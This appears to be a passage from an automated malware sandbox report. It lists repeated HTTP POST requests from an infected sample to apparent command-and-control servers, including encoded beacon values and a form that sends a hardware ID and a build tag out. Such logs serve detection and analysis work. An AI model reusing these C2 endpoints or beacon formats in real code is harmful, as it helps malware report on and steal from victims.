Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAFHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 2d 2d 0d 0a Data Ascii: ------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="build"sila------EBAEBFIIECBGCBGDHCAF--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
